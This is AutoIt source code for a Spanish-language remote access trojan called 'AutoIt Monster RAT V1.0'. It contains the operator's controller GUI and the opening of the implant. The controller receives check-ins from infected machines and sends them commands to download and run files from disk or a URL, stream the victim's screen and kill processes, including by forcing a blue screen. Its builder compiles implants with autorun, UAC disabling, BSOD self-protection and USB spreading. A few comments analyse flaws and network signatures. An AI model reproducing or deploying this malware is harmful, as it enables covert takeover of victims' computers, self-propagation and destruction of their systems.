Cliente:
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GuiListView.au3>
#include <GUIConstantsEx.au3>
#include <GuiStatusBar.au3>
#include <ListViewConstants.au3>
#include <StaticConstants.au3>
#include <TabConstants.au3>
#include <WindowsConstants.au3>
#region ### START Koda GUI section ### Form=c:\users\antonio\desktop\autoit spycam v1.0\forms\newclient.kxf
TrayTip('AutoIt Monster RAT V1.0', 'Bienvenido ' & @UserName, 1)
Opt("TCPTimeout", 0)
$Form1 = GUICreate("AutoIt Monster RAT V1.0", 822, 300, -1, -1)
$Panel = GUICtrlCreateTab(0, 0, 820, 280)
$TabSheet1 = GUICtrlCreateTabItem("Panel")
GUICtrlSetState(-1, $GUI_SHOW)
$ListView1 = GUICtrlCreateListView("LOCALIZACIÓN |IDENTIFICADOR |PUERTO |DIRECCIÓN IP |NOMBRE DE USUARIO |SISTEMA OPERATIVO |ANTIVIRUS ", 8, 32, 802, 214)
$Menu = GUICtrlCreateContextMenu($ListView1)
$Refresh = GUICtrlCreateMenuItem('Refrescar', $Menu)
$Disconect = GUICtrlCreateMenuItem('Desconectar', $Menu)
$Uninstall = GUICtrlCreateMenuItem('Desinstalar', $Menu)
$Down_Eje = GUICtrlCreateMenu('Descargar y Ejecutar', $Menu)
$Disk = GUICtrlCreateMenuItem('Desde Disco', $Down_Eje)
$URL = GUICtrlCreateMenuItem('Desde URL', $Down_Eje)
$Remote = GUICtrlCreateMenuItem('Escritorio Remoto', $Menu)
$ProcessView = GUICtrlCreateMenuItem('Listar Procesos', $Menu)
$OpenWeb = GUICtrlCreateMenuItem('Abrir Pagina WEB', $Menu)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button7 = GUICtrlCreateButton("Start", 8, 248, 75, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button8 = GUICtrlCreateButton("Stop", 88, 248, 75, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$TabSheet2 = GUICtrlCreateTabItem("Opciones de Escucha")
$Label1 = GUICtrlCreateLabel("Puerto de escucha", 8, 56, 122, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input1 = GUICtrlCreateInput("81", 136, 56, 57, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Button1 = GUICtrlCreateButton("+", 200, 56, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button2 = GUICtrlCreateButton("-", 232, 56, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label2 = GUICtrlCreateLabel("Contraseña", 56, 96, 76, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input2 = GUICtrlCreateInput("", 136, 96, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER, $ES_PASSWORD))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Label8 = GUICtrlCreateLabel("Limite de conexiones", 8, 136, 141, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input9 = GUICtrlCreateInput("200", 152, 136, 57, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Button9 = GUICtrlCreateButton("+", 216, 136, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button10 = GUICtrlCreateButton("-", 248, 136, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$TabSheet3 = GUICtrlCreateTabItem("Crear Server")
$Label3 = GUICtrlCreateLabel("Direccion IP:", 160, 72, 85, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input3 = GUICtrlCreateInput("", 248, 72, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label4 = GUICtrlCreateLabel("Puerto:", 192, 104, 50, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Button3 = GUICtrlCreateButton("-", 344, 104, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button4 = GUICtrlCreateButton("+", 312, 104, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Input4 = GUICtrlCreateInput("81", 248, 104, 57, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label5 = GUICtrlCreateLabel("Identificador", 160, 144, 84, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input5 = GUICtrlCreateInput("", 248, 144, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label6 = GUICtrlCreateLabel("Contraseña:", 168, 184, 80, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input6 = GUICtrlCreateInput("", 248, 184, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER, $ES_PASSWORD))
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
$Checkbox2 = GUICtrlCreateCheckbox("Autoinicio con .VBS", 408, 72, 145, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Checkbox4 = GUICtrlCreateCheckbox("Desactivar UAC", 408, 100, 145, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Checkbox5 = GUICtrlCreateCheckbox("Delay", 408, 128, 49, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Input7 = GUICtrlCreateInput("1", 464, 128, 49, 22, BitOR($GUI_SS_DEFAULT_INPUT,$ES_CENTER))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$label15 = GUICtrlCreateLabel("Segundos", 520, 128, 60, 25)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Button6 = GUICtrlCreateButton("Crear Server", 640, 232, 163, 33)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Checkbox1 = GUICtrlCreateCheckbox("Protejer proceso con BSOD", 408, 152, 250, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Checkbox3 = GUICtrlCreateCheckbox("Spread USB", 408, 184, 97, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$TabSheet4 = GUICtrlCreateTabItem("About")
$Pic1 = GUICtrlCreatePic("Banner\Naker90.jpg", 16, 32, 276, 236)
$Label9 = GUICtrlCreateLabel("Coder: Naker90", 400, 144, 230, 46)
GUICtrlSetFont(-1, 26, 800, 0, "Tekton Pro")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Label10 = GUICtrlCreateLabel("AutoIt Monster RAT V1.0", 344, 88, 375, 46)
GUICtrlSetFont(-1, 26, 800, 0, "Tekton Pro")
GUICtrlSetBkColor(-1, 0xFFFFFF)
GUICtrlCreateTabItem("")
$StatusBar1 = _GUICtrlStatusBar_Create($Form1)
GUISetState(@SW_SHOW)
Local $sParts[4] = [80, 200, 370, 400]
_GUICtrlStatusBar_SetParts($StatusBar1, $sParts)
_GUICtrlStatusBar_SetText($StatusBar1, 'Esperando..', 0, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Servers Online: 0', 1, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Sistema operativo: ' & @OSVersion & ' ' & @OSArch, 2, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Puerto actual:', 3, 0)
Global $sListen
Global $sServers = 0
TCPStartup()
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Form1
Case $Button8 ;Stop
TCPShutdown()
_GUICtrlListView_DeleteAllItems($ListView1)
_GUICtrlStatusBar_SetText($StatusBar1, 'Esperando..', 0, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Servers Online: 0', 1, 0)
$sServers = 0
Case $Button7 ;Start
Global $sPuerto = GUICtrlRead($Input1)
Global $sPass = GUICtrlRead($Input2)
Global $sLimite = GUICtrlRead($Input9)
Global $sConections[$sLimite][2]
_GUICtrlStatusBar_SetText($StatusBar1, 'Escuchando..', 0, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Puerto actual: ' & GUICtrlRead($Input1), 3, 0)
$sListen = TCPListen('0.0.0.0', $sPuerto, 200)
If $sListen = -1 Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'El puerto ' & $sPuerto & ' se encuentra en uso por otra aplicación')
TCPShutdown()
EndIf
Case $Button1
Local $sContenido = GUICtrlRead($Input1)
If $sContenido = '65535' Then
Else
Local $sSuma = $sContenido + 1
GUICtrlSetData($Input1, $sSuma)
EndIf
Case $Button2
Local $sContenido2 = GUICtrlRead($Input1)
If $sContenido2 = '0' Then
Else
Local $sResta = $sContenido2 - 1
GUICtrlSetData($Input1, $sResta)
EndIf
Case $Button4
Local $sContenido = GUICtrlRead($Input4)
If $sContenido = '65535' Then
Else
Local $sSuma = $sContenido + 1
GUICtrlSetData($Input4, $sSuma)
EndIf
Case $Button3
Local $sContenido2 = GUICtrlRead($Input4)
If $sContenido2 = '0' Then
Else
Local $sResta = $sContenido2 - 1
GUICtrlSetData($Input4, $sResta)
EndIf
Case $Button9
Local $sContenido = GUICtrlRead($Input9)
Local $sSuma = $sContenido + 1
GUICtrlSetData($Input9, $sSuma)
Case $Button10
Local $sContenido2 = GUICtrlRead($Input9)
If $sContenido2 = '0' Then
Else
Local $sResta = $sContenido2 - 1
GUICtrlSetData($Input9, $sResta)
EndIf
Case $Refresh
Local $sSelected = _ItemSelect()
_GUICtrlListView_DeleteItem($ListView1, $sSelected)
TCPSend($sConections[$sSelected][0], 'Refrescar')
Case $Disconect
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Disconect')
Case $Uninstall
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Uninstall')
Case $Disk
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Disk')
Local $sFile = FileOpenDialog('Seleccione el archivo a ejecutar', @ScriptDir, 'ALL (*.*)')
Local $sEXT = StringSplit($sFile, '.', 1)
Local $sEnd = UBound($sEXT) - 1
TCPSend($sConections[$sSelected][0], $sEXT[$sEnd])
Local $sFileopen = FileOpen($sFile)
While 1
Local $sData = FileRead($sFileopen, 2048)
If @error Then ExitLoop
TCPSend($sConections[$sSelected][0], $sData)
If @error Then ExitLoop
WEnd
FileClose($sFileopen)
TCPSend($sConections[$sSelected][0], 'OK')
Case $URL
Local $sURL
Local $sSelected = _ItemSelect()
_DownURL()
TCPSend($sConections[$sSelected][0], 'URL')
Local $sEXT = StringSplit($sURL, '.', 1)
Local $sEnd = UBound($sEXT) - 1
TCPSend($sConections[$sSelected][0], $sEXT[$sEnd])
Local $sCifrado = Cifrado_Simple_Cifrar($sURL, 54)
TCPSend($sConections[$sSelected][0], $sCifrado)
Case $Remote
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Remote')
_EscritorioRemoto()
Case $ProcessView
Local $sSelected = _ItemSelect()
_ProcessView()
Case $OpenWeb
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'WEB')
_PaginaWeb()
Case $Button6
Local $sIP = GUICtrlRead($Input3)
Local $sPort = GUICtrlRead($Input4)
Local $sID = GUICtrlRead($Input5)
Local $Pass = GUICtrlRead($Input6)
Local $sCode = '#NotrayIcon' & @CRLF & '#include <ScreenCapture.au3>' & @CRLF & '#include <Security.au3>' & @CRLF & '#include <File.au3>' & @CRLF & '#include <GDIPlus.au3>' & @CRLF & '#RequireAdmin' & @CRLF & 'TCPStartup()' & @CRLF & _
'Local $sIP = TCPNameToIP(' & Chr(34) & $sIP & Chr(34) & ')' & @CRLF & 'Local $sPuerto = ' & $sPort & @CRLF & 'Local $sPass = ' & Chr(34) & $Pass & Chr(34) & @CRLF & _
'Local $sServerName = ' & Chr(34) & $sID & Chr(34) & @CRLF & 'Global $sConect' & @CRLF
If GUICtrlRead($Checkbox2) = 1 Then
Local $sCode2 = 'Local $Autorun = 1' & @CRLF
Else
Local $sCode2 = 'Local $Autorun = 0' & @CRLF
EndIf
If GUICtrlRead($Checkbox1) = 1 Then
Local $sCode3 = 'Local $sAtis = 1' & @CRLF
Else
Local $sCode3 = 'Local $sAtis = 0' & @CRLF
EndIf
If GUICtrlRead($Checkbox3) = 1 Then
Local $sCode4 = 'Local $sSpread = 1' & @CRLF
Else
Local $sCode4 = 'Local $sSpread = 0' & @CRLF
EndIf
If GUICtrlRead($Checkbox4) = 1 Then
Local $sCode5 = 'Local $sUAC = 1' & @CRLF
Else
Local $sCode5 = 'Local $sUAC = 0' & @CRLF
EndIf
if GUICtrlRead($Checkbox5) = 1 then
Local $sCode6 = 'Local $sDelay = 1' & @CRLF & 'Local $sSeg = ' & GUICtrlRead($Input7) & ' * 1000'
Else
Local $sCode6 = 'Local $sDelay = 0' & @CRLF & 'Local $sSeg'
EndIf
Local $sServer = FileRead('Compilacion\Server.au3')
Local $sNewServer = FileOpen('Compilacion\New Server.au3', 17)
FileWrite($sNewServer, $sCode)
FileWrite($sNewServer, $sCode2)
FileWrite($sNewServer, $sCode3)
FileWrite($sNewServer, $sCode4)
FileWrite($sNewServer, $sCode5)
FileWrite($sNewServer, $sCode6)
FileWrite($sNewServer, $sServer)
FileClose($sNewServer)
Sleep(1000)
Local $in = '/in ' & Chr(34) & @ScriptDir & '\Compilacion\New Server.au3' & Chr(34) & ' '
Local $out = '/out ' & Chr(34) & 'New Server.exe' & Chr(34) & ' '
Local $systemtipe = '/x86 '
ShellExecute('Compilacion\Aut2Exe.exe', $in & $out & '/nopack /x86 /gui')
Sleep(1000)
FileDelete('Compilacion\New Server.au3')
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Server Creado con exito')
EndSwitch
_Connect()
WEnd
; Obfuscates $texto by adding $numero to the character code of each character.
; Analyst note: this is a fixed additive shift, not encryption. Subtracting the
; same number restores the text, so a URL sent through it (the 'Desde URL'
; handler passes 54) is readable by anyone holding a capture of the session.
; Parameters: $texto  - string to shift
;             $numero - amount added to every character code
; Returns:    the shifted string
Func Cifrado_Simple_Cifrar($texto, $numero)
$Resultado = ''
For $i = 1 To StringLen($texto)
; StringMid without a count returns the remainder of the string; Asc() then
; uses only its first character, so one character is processed per pass.
$Resultado = $Resultado & Chr(Asc(StringMid($texto, $i)) + $numero)
Next
Return $Resultado
EndFunc ;==>Cifrado_Simple_Cifrar
; Polled once per pass of the controller's GUI loop: accepts one pending
; connection on $sListen and, if its check-in carries the expected password,
; registers it in $sConections and in the list view.
;
; Check-in format as parsed here: one cleartext string of '|'-separated fields
; that contains 'OK'. Field 1 is the OS language code, fields 2-7 are shown in
; the list view columns, field 8 is the password. Nothing is encrypted or
; encoded, so this string is a usable network signature for the family.
Func _Connect()
Local $sAccept = TCPAccept($sListen)
If $sAccept <> -1 Then
; Blocks the GUI until a read contains 'OK'. Each read replaces $sRev rather
; than appending, so the whole check-in has to arrive in a single TCPRecv.
Do
Local $sRev = TCPRecv($sAccept, 1024)
Until StringInStr($sRev, 'OK')
Local $sSplit = StringSplit($sRev, '|', 1)
; NOTE(review): index 8 is read without checking how many fields arrived.
; '=' on strings is AutoIt's case-insensitive comparison, so the password
; match ignores case.
If $sSplit[8] = $sPass Then
Local $sLocalizacion = GetLang($sSplit[1])
; Column 0 holds the socket, column 1 the list-view item id.
$sConections[$sServers][0] = $sAccept
$sConections[$sServers][1] = GUICtrlCreateListViewItem($sLocalizacion & '|' & $sSplit[2] & '|' & $sSplit[3] & '|' & $sSplit[4] & '|' & $sSplit[5] & '|' & $sSplit[6] & '|' & $sSplit[7], $ListView1)
$sServers += 1
_GUICtrlStatusBar_SetText($StatusBar1, 'Servers Online: ' & $sServers, 1, 0)
SoundPlay('Sound\Monster.mp3', 0)
TrayTip('AutoIt Monster RAT V1.0', 'Nuevo Server Online: ' & $sSplit[4], 0, 1)
EndIf
; A connection whose password does not match is neither registered nor
; closed in this function.
EndIf
EndFunc ;==>_Connect
; Returns the index of the selected row in $ListView1; the callers use it as
; the row index into $sConections.
; If several rows are selected the highest index wins. If none is selected the
; function returns the never-assigned Local $sInput.
Func _ItemSelect()
Local $sInput
; The upper bound is inclusive, so index $sServers (one past the last
; registered connection) is also queried.
For $i = 0 To $sServers
Local $sGetItem = _GUICtrlListView_GetItemSelected($ListView1, $i)
If $sGetItem = True Then
$sInput = $i
EndIf
Next
Return $sInput
EndFunc ;==>_ItemSelect
Func GetLang($sOsLang)
Local $sLang[222] = ['China', 'Arabia Saudi', 'Bulgaria', 'España', 'China', 'Republica Checa', 'Dinamarca', 'Alemania', 'Gracia', 'Estados Unidos', 'España', 'Finlandia', 'Francia', 'Israel', 'Hungria', 'Islandia', 'Italia', 'Japon', 'Korea', 'Paises Bajos', _
'Noruega', 'Polonia', 'Brasil', 'Suiza', 'Rumania', 'Rusia', 'Croacia', 'Eslovaquia', 'Albania', 'Suecia', 'Tailandia', 'Turquia', 'Pakistan', 'Indonesia', 'Ucrania', 'Bielorrusia', 'Eslovenia', 'Estonia', 'Letonia', 'Lituania', _
'Tayikistán', 'Iran', 'Vietnam', 'Armenia', 'Azerbaiyán', 'Pais Vasco', 'Alemania', 'Macedonia', 'Sudafrica', 'Sudafrica', 'Sudafrica', 'Sudafrica', 'Georgia', 'Islas Feroe', 'India', 'Malta', 'Noruega', 'Malasia', 'Kazajstán', 'Kirguistán', _
'Kenia', 'Turkmenistán', 'Uzbekistán', 'Rusia', 'Bangladesh', 'India', 'India', 'India', 'India', 'India', 'India', 'India', 'India', 'Mongolia', 'China', 'Reino Unido', 'Camboya', 'Lao', 'España', _
'India', 'Siria', 'Lanka', 'Cherokee', 'Canada', 'Etiopia', 'Nepal', 'Paises Bajos', 'Afganistán', 'Filipinas', 'Maldivas', 'Nigeria', 'Nigeria', 'Bolivia', 'Sudafrica', 'Rusia', 'Luxemburgo', 'Groenlandia', _
'Nigeria', 'Etiopia', 'Estados Unidos', 'China', 'Chile', 'Canada', 'Francia', 'China', 'Nueva Zelanda', 'Francia', 'Francia', 'Francia', 'Rusia', 'Guatemala', 'Ruanda', 'Senegal', 'Afganistán', 'Reino Unido', 'Iraq', 'Iraq', _
'España', 'China', 'Suiza', 'Reino Unido', 'Mexico', 'Belgica', 'Suiza', 'Belgica', 'Noruega', 'Portugal', 'Serbia y Montenegro', 'Finlandia', 'Urdu', 'Azerbaiyán', 'Alemania', 'Botswana', 'Suecia', 'Irlanda', 'Brunei Darassalam', 'Uzbekistán', _
'Bangladesh', 'Pakistan', 'Sri Lanka', 'Mongolia', 'Pakistan', 'Canada', 'Argelia', 'Senegal', 'Ecuador', 'Egipto', 'Hong Kong', 'Austria', 'Australia', 'España', 'Canada', 'Serbia y Montenegro', 'Finlandia', 'Peru', 'Libia', _
'Singapur', 'Luxemburgo', 'Canada', 'Guatemala', 'Suiza', 'Bosnia y Herzegovina', 'Noruega', 'Marruecos', 'Argelia', 'China', 'Liechtenstein', 'Nueva Zelanda', 'Costa Rica', 'Luxemburgo', 'Bosnia y Herzegovina', 'Suecia', 'Marruecos', 'Irlanda', 'Panamá', 'Monaco', _
'Bosnia y Herzegovina', 'Noruega', 'Tunez', 'Sudáfrica', 'República Dominicana', 'Bosnia y Herzegovina', 'Suecia', 'Omán', 'Jamaica', 'Venezuela', 'Bosnia y Herzegovina', 'Finlandia', 'Yemen', 'El Caribe', 'Colombia', 'Serbia', 'Finlandia', 'Siria', 'Belice', 'Peru', _
'Servia', 'Jordan', 'Trinidad y Tobago', 'Argentina', 'Montenegro', 'Libano', 'Zimbabwe', 'Ecuador', 'Montenegro', 'Kuwait', 'Filipinas', 'Chile', 'Emiratos', 'Bahrain', 'Paraguay', 'Qatar', 'India', 'Bolivia', 'Malasia', 'El Salvador', _
'Singapur', 'Honduras', 'Nicaragua', 'Puerto Rico', ' Estados Unidos', 'China']
Local $sHEX[222] = ['0004', '0401', '0402', '0403', '0404', '0405', '0406', '0407', '0408', '0409', '040A', '040B', '040C', '040D', '040E', '040F', '0410', '0411', '0412', '0413', _
'0414', '0415', '0416', '0417', '0418', '0419', '041A', '041B', '041C', '041D', '041E', '041F', '0420', '0421', '0422', '0423', '0424', '0425', '0426', '0427', _
'0428', '0429', '042A', '042B', '042C', '042D', '042E', '042F', '0432', '0434', '0435', '0436', '0437', '0438', '0439', '043A', '043B', '043e', '043F', '0440', _
'0441', '0442', '0443', '0444', '0445', '0446', '0447', '0448', '0449', '044A', '044B', '044E', '044F', '0450', '0451', '0452', '0453', '0454', '0456', _
'0457', '045A', '045B', '045C', '045D', '045E', '0461', '0462', '0463', '0464', '0465', '0468', '046A', '046B', '046C', '046D', '046E', '046F', _
'0470', '0473', '0475', '0478', '047A', '047C', '047E', '0480', '0481', '0482', '0483', '0484', '0485', '0486', '0487', '0488', '048C', '0491', '0492', '0801', _
'0803', '0804', '0807', '0809', '080A', '080C', '0810', '0813', '0814', '0816', '081A', '081D', '0820', '082C', '082E', '0832', '083B', '083C', '083E', '0843', _
'0845', '0846', '0849', '0850', '0859', '085D', '085F', '0867', '086B', '0C01', '0C04', '0C07', '0C09', '0C0A', '0C0C', '0C1A', '0C3B', '0C6B', '1001', _
'1004', '1007', '1009', '100A', '100C', '101A', '103B', '105F', '1401', '1404', '1407', '1409', '140A', '140C', '141A', '143B', '1801', '1809', '180A', '180C', _
'180A', '183B', '1C01', '1c09', '1C0A', '1C1A', '1C3B', '2001', '2009', '200A', '201A', '203B', '2401', '2409', '240A', '241A', '243B', '2801', '2809', '280A', _
'281A', '2C01', '2C09', '2C0A', '2C1A', '3001', '3009', '300A', '301A', '3401', '3409', '340A', '3801', '380A', '3C01', '3C0A', '4001', '4009', '400A', '4409', _
'440A', '4809', '480A', '4C0A', '500A', '540A']
For $i = 0 To 222
If StringInStr($sHEX[$i], $sOsLang) Then
Return $sLang[$i]
EndIf
Next
EndFunc ;==>GetLang
Func _DownURL()
#region ### START Koda GUI section ### Form=C:\Users\Antonio\Desktop\AutoIt Monster RAT V1.0\Forms\URL.kxf
$FormURL = GUICreate("AutoIt Monster RAT V1.0 // URL", 412, 69, -1, -1)
$InURL = GUICtrlCreateInput("", 8, 8, 393, 21, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
$Pegar = GUICtrlCreateButton("Pegar", 8, 32, 75, 25)
$Limpiar = GUICtrlCreateButton("Limpiar", 88, 32, 75, 25)
$Comprobar = GUICtrlCreateButton("Comprobar", 168, 32, 75, 25)
$Enviar = GUICtrlCreateButton("Enviar", 248, 32, 155, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormURL)
ExitLoop
Case $Pegar
GUICtrlSetData($InURL, ClipGet())
Case $Limpiar
GUICtrlSetData($InURL, '')
Case $Comprobar
If GUICtrlRead($InURL) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la URL')
Else
ShellExecute(GUICtrlRead($InURL))
EndIf
Case $Enviar
If GUICtrlRead($InURL) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la URL')
Else
$sURL = GUICtrlRead($InURL)
GUIDelete($FormURL)
ExitLoop
EndIf
EndSwitch
WEnd
EndFunc ;==>_DownURL
Func _EscritorioRemoto()
#region ### START Koda GUI section ### Form=c:\users\antonio\desktop\autoit monster rat v1.0\forms\escritorioremoto.kxf
Global $FormRemote = GUICreate("AutoIt Monster RAT V1.0 // Escritorio Remoto", 1170, 598, -1, -1)
Global $Pic1 = GUICtrlCreatePic("", 8, 8, 1156, 556)
$Start = GUICtrlCreateButton("Start", 8, 568, 195, 25)
$Stop = GUICtrlCreateLabel("Presione ESC para dejar de capturar la pantalla", 208, 568, 195, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormRemote)
ExitLoop
Case $Start
AdlibRegister('_RemoteDesktop', 100)
EndSwitch
WEnd
EndFunc ;==>_EscritorioRemoto
; ESC hotkey handler registered by _RemoteDesktop: sends the literal 'Fin' to
; the selected connection and stops the periodic _RemoteDesktop callback.
; 'Fin' is the string the server side's 'Remote' loop compares against to stop
; capturing.
Func _Exit()
TCPSend($sConections[$sSelected][0], 'Fin')
AdlibUnRegister('_RemoteDesktop')
EndFunc ;==>_Exit
; Adlib callback (registered with a 100 ms interval by _EscritorioRemoto):
; receives one screen image from the selected connection and shows it.
; Controller-side artefact: the image is written to @TempDir\003.jpg on the
; operator's machine and overwritten on every frame.
Func _RemoteDesktop()
HotKeySet('{ESC}', '_Exit')
; Mode 18 = 2 (write, erase previous contents) + 16 (binary).
Local $sImage = FileOpen(@TempDir & '\003.jpg', 18)
Do
Local $sData = TCPRecv($sConections[$sSelected][0], 2048)
If @error Then ExitLoop 2
; End-of-frame marker: a chunk whose last two characters are 'OK'. That chunk
; is dropped in full, including any image bytes it carried before the marker.
If StringRight($sData, 2) = 'OK' Then ExitLoop
FileWrite($sImage, $sData)
Until False
FileClose($sImage)
GUICtrlSetImage($Pic1, @TempDir & '\003.jpg')
EndFunc ;==>_RemoteDesktop
Func _ProcessView()
#region ### START Koda GUI section ### Form=c:\users\antonio\desktop\autoit monster rat v1.0\forms\processview.kxf
$FormProcess = GUICreate("AutoIt Monster RAT V1.0 // Listado de procesos", 406, 341, -1, -1)
$ListProcess = GUICtrlCreateListView("PROCESO |PID ", 8, 8, 250, 326)
$ProcessMenu = GUICtrlCreateContextMenu($ListProcess)
$ProcessKill = GUICtrlCreateMenuItem('Terminar Proceso', $ProcessMenu)
$ProcessBSOD = GUICtrlCreateMenuItem('Terminar Proceso con BSOD', $ProcessMenu)
$StartProcess = GUICtrlCreateButton("Start", 264, 8, 139, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormProcess)
ExitLoop
Case $StartProcess
TCPSend($sConections[$sSelected][0], 'Process')
Do
Local $sProcessREV = TCPRecv($sConections[$sSelected][0], 3072)
Sleep(250)
Until StringRight($sProcessREV, 2) = 'OK'
Local $sSplit = StringSplit($sProcessREV, '@', 1)
Local $sTotal = UBound($sSplit) - 2
For $si = 1 To $sTotal
GUICtrlCreateListViewItem($sSplit[$si], $ListProcess)
Next
Case $ProcessBSOD
TCPSend($sConections[$sSelected][0], 'KillBSOD')
Local $sInput
For $i = 0 To _GUICtrlListView_GetItemCount($ListProcess)
Local $sGetItem = _GUICtrlListView_GetItemSelected($ListProcess, $i)
If $sGetItem = True Then
$sInput = $i
EndIf
Next
Local $sItem = _GUICtrlListView_GetItemText($ListProcess, $sInput)
TCPSend($sConections[$sSelected][0], $sItem)
Case $ProcessKill
TCPSend($sConections[$sSelected][0], 'Kill')
Local $sInput
For $i = 0 To _GUICtrlListView_GetItemCount($ListProcess)
Local $sGetItem = _GUICtrlListView_GetItemSelected($ListProcess, $i)
If $sGetItem = True Then
$sInput = $i
EndIf
Next
Local $sItem = _GUICtrlListView_GetItemText($ListProcess, $sInput)
TCPSend($sConections[$sSelected][0], $sItem)
EndSwitch
WEnd
EndFunc ;==>_ProcessView
Func _PaginaWeb()
#region ### START Koda GUI section ### Form=C:\Users\Antonio\Desktop\AutoIt Monster RAT V1.0\Forms\PaginaWEB.kxf
$FormWEB = GUICreate("AutoIt Monster RAT V1.0 // Abrir Pagina WEB", 492, 68, -1, -1)
$InWEB = GUICtrlCreateInput("", 8, 8, 473, 21, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
$WEBPegar = GUICtrlCreateButton("Pegar", 8, 32, 75, 25)
$WEBLimpiar = GUICtrlCreateButton("Limpiar", 88, 32, 75, 25)
$WEBProbar = GUICtrlCreateButton("Probar WEB", 168, 32, 75, 25)
$WEBEnviar = GUICtrlCreateButton("Enviar", 248, 32, 235, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormWEB)
ExitLoop
Case $WEBPegar
GUICtrlSetData($InWEB, ClipGet())
Case $WEBLimpiar
GUICtrlSetData($InWEB, '')
Case $WEBProbar
If GUICtrlRead($InWEB) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la Pagina WEB')
Else
ShellExecute(GUICtrlRead($InWEB))
EndIf
Case $WEBEnviar
If GUICtrlRead($InWEB) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la Pagina WEB')
Else
TCPSend($sConections[$sSelected][0], GUICtrlRead($InWEB))
EndIf
EndSwitch
WEnd
EndFunc ;==>_PaginaWeb
#NotrayIcon
#include <ScreenCapture.au3>
#include <Security.au3>
#include <File.au3>
#include <GDIPlus.au3>
#RequireAdmin
; ---- Server (implant) side: configuration values and start-up actions ----
; The assignments below have the same shape as the text the controller's
; 'Crear Server' handler writes in front of Compilacion\Server.au3. The values
; shown here are the sample's: loopback host, port 81, empty password.
